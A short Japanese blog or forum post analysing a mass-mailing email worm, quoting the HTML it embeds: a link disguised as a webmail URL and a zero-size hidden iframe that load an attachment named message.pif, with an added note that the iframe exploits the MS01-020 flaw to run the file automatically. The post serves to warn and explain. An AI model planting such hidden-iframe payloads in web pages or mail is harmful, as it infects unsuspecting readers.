wakatonoさんの所でも言及されてますが、URLクリックでも発動するようになってますね。
宛先メールアドレスが「ユーザ名@ドメイン名」だと

<a href=message.pif height=0 width=0>www.ドメイン名/inmail/ユーザ名/mread.php?sessionid-6400</a>
<iframe
src=message.pif height=0 width=0>

というリンクが埋め込まれてます。
iframeの所は環境によっては自動実行されたりするのかな？

追記：
IFRAMEの所はMS01-020の脆弱性を突いたものらしい。＞けんさんの情報より